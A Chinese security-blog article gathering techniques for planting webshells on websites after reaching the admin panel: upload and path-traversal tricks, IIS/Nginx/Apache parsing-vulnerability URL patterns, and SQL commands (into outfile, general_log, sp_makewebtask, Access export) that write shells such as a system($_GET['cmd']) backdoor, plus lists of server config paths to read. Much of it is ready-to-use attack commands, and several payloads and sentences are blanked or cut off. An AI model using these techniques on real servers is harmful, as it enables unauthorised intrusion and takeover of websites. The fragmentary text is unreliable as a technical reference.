专栏名称: HACK学习呀

HACK学习，专注于互联网安全与黑客精神；渗透测试，社会工程学，Python黑客编程，资源分享，Web渗透培训，电脑技巧，渗透技巧等，为广大网络安全爱好者一个交流分享学习的平台！

干货 | 渗透之网站Getshell最全总结

HACK学习呀 · 公众号 · 黑客 · 2021-01-17 12:20

正文

Getshell分为进管理员后台Getshell和不进后台Getshell，本文主要总结常见进后台Getshell和部分。

进后台Getshell

管理员后台直接Getshell

管理员后台直接上传Getshell，有时候带密码的Webshell连接时容易被waf拦截，可以上传不加密的Webshell如有权限限制可以尝试管理后台自带的修改文件名功能在文件名前加../来穿越目录，如上传的文件为a.php，将a.php修改为../a.php。

后台数据库备份Getshell

后台数据库备份getshell，上传图片马并获取图片马路径，通过数据库备份修改后缀名，如有后缀名无法修改或路径无法修改限制可修改前端代码绕过，当所备份的数据库来源无法修改时，我们可以通过首先将一句话木马写入数据库，比如通过新建管理员用户，将用户名用一句话木马代替（用户名通常有长度限制，在前端修改maxlength即可），然后再通过备份数据库后访问此界面Getshell。

各类上传Getshell

https://choge.top/2020/02/29/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%AB%98%E7%BA%A7%E5%88%A9%E7%94%A8/

修改网站上传类型Getshell

修改网站上传类型，后台设置中添加aasps|asp|php|jsp|aspx|asa|cer，保存后上传aasps文件，上传后为asp文件可以解析Getshll

上传其他脚本类型Getshell

一台服务器有多个站，如a网站为asp脚本，b网站为php脚本，而a中限制了上传文件类型为asp的文件，此时可以上传php的脚本，来拿shell；也可以尝试脚本文件后缀名改为asa或者在后面直接加个.如xx.asp.来突破文件类型限制进行上传来Getshell

解析漏洞Getshell

IIS6.0解析漏洞

http://www.xxx.com/xx.asp/xx.jpg

http://www.xxx.com/xx.asp/xx.txt

http://www.xxx.com/xx.asp/xx.asp;jpg

IIS7.0/7.5、Nginx<8.0解析漏洞

http://www.xxx.com/xx.jpg/.php

Nginx<8.03空字节代码执行漏洞

版本范围：Nginx0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37

http://www.xxx.com/xx.jpg%00.php

Apache解析漏洞

http://www.xxx.com/xx.php.owf.rar 逆向解析，直到能解析出php为止

CVE-2013-4547 Nginx解析漏洞

http://www.xxx.com/xx.jpg（非编码空格）\0.php

编辑器漏洞Getshell

传送门：

https://navisec.it/%e7%bc%96%e8%be%91%e5%99%a8%e6%bc%8f%e6%b4%9e%e6%89%8b%e5%86%8c/

网站配置插马Getshell

进入后台后，网站配置插马getshell，可以找到源码本地搭建，插入时注意与源码闭合，如果插入出错可能导致网站报废。如asp中单引号表示单行注释作用 "%>

编辑器模版Getshell

通过网站的模版编写一句话，然后生成脚本文件getshell 通过将木马添加到压缩文件，把名字改为网站的模版类型，上传到服务器，getshell）（新建或修改目录名为xx.asp/ 此目录下的jsp，html会以asp执行，配置iis6.有0解析漏洞

修改脚本文件Getshell

修改后台脚本文件插入一句话直接Getshell，尽量插在头和尾。

###上传插件、更新页面Getshell

wordpress，dz等，如编辑wordpress404页面插入一句话，可以先下载对应版本找到404路径，部分OA上传插件Getshell， jboss，tomcat上传war包getshell等

执行sql语句写入Webshell

首先执行错误的sql语句，使其暴露出网站的根目录，以ecshop为例，进入后台执行sql查询 select " " into outfile "C:\\vulcms\\ecshopv3.6\\ecshop\\v01cano.php"; 关于此语句说明，在windows中有时候需要使用斜杠/有时候需要使用双反斜杠\末尾有时候需要分号，有时候也不需要分号。也可以先将一句话通过ecshop的新建管理员写入到user表中，然后通过数据库备份配合解析漏洞Getshell。

命令执行Getshell

Windows

echo ^^ >c:\1.php

Linux

echo -e "" > 1.php

Linux需要在$前加\进行防转义，Windows需要在

文件包含Getshell

文件包含有时可绕过waf

asp包含

include file="123.jpg" 调用的文件必须和被调用的文件在同一目录，否则找不到，如果不在同一目录，用下面语句也使用如下代码 include virtual="文件所在目录/123.jpg"

php包含

1
2
3


include('123.jpg');
?>

使用php://input

使用burpsuite截取数据包，并修改内容转发(还可以使用hackbar工具中的post data中输入 2222')?> 等一句话木马)

截取get请求

将一句话木马

浏览器访问查看是否成功

数据库命令执行Getshell

Access导出

Access可导出xxx等文件需要配合解析漏洞

create table cmd (a varchar(50));
insert into cmd (a) values ('一句话木马')   #一句话木马如：
select * into [a] in 'e:\web\webshellcc\1.asa;x.xls' 'excel 4.0;' from cmd 
drop table cmd

菜刀直连 https://www.webshell.cc/1.asa;x.xls

Sqlserver导出

1	exec sp_makewebtask 'C:\test1.php','select "" '--

Mysql导出

以phpMyAdmin为例

方式一

create TABLE xiaoma (xiaoma1 text NOT NULL);
insert INTO xiaoma (xiaoma1) VALUES('');
select xiaoma1 from xiaoma into outfile 'D:/phpstudy/www/7.php';
drop TABLE IF EXISTS xiaoma;

方式二

1	select "" into outfile 'D:/phpstudy/www/a.php'

方式三

当数据库路径未知时Getshell

1 2	//创建表a,并且将httpd.conf写入到表a中 create table a(a text);load data infile "C:/phpStudy/Apache/conf/httpd.conf" into table a;

然后执行导出操作，将该文件下载，使用notepad++打开，最后搜索documentroot，即可找到网站的根目录：

文件可能存在的一些路径：

# Windows
c:\windows\php.ini                             # php配置文件
c:\windows\system32\inetsrv\MetaBase.xml       # IIS虚拟主机配置文件
 # Linux
/etc/php.ini                                   # php配置文件
/etc/httpd/conf.d/php.conf
/etc/httpd/conf/httpd.conf                     # Apache配置文件
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/mysql
/user/local/httpd/conf/httpd.conf
/usr/local/apache/conf/extra/httpd-vhosts.conf # 虚拟目录配置文件
/user/local/nginx/conf/httpd.conf              # Nginx配置文件

方式四通过load_file函数直接加载该文件内容

1	select load_file('C:/phpStudy/Apache/conf/httpd.conf');

同时需要做如下配置

方式五

general_log_file方法获取Webshell

show global variables like 'secure%' 显示secure_file_priv的值为NULL，不能利用写into outfile写木马getshell。

show global variables like "%genera%";  #查看genera文件配置情况
set global general_log = off;   #关闭general_log  
set global general_log = 'on';  #如果general_log关闭需要开启
set global general_log_file = 'D:/www/web/shell.php'

方式六

可执行命令方式

select ' \'; system($_GET[\'cmd\']); echo \'\'; ?>' INTO OUTFILE 'd:/www/shell.php'

使用方法

1	www.xxx.com/shell.php?cmd=ipconfig #cmd=后面加命令

方式七

过杀毒软件方式

上传图片马c.jpg，图片马内容如下：

".base64_decode($a));?>

导出Webshell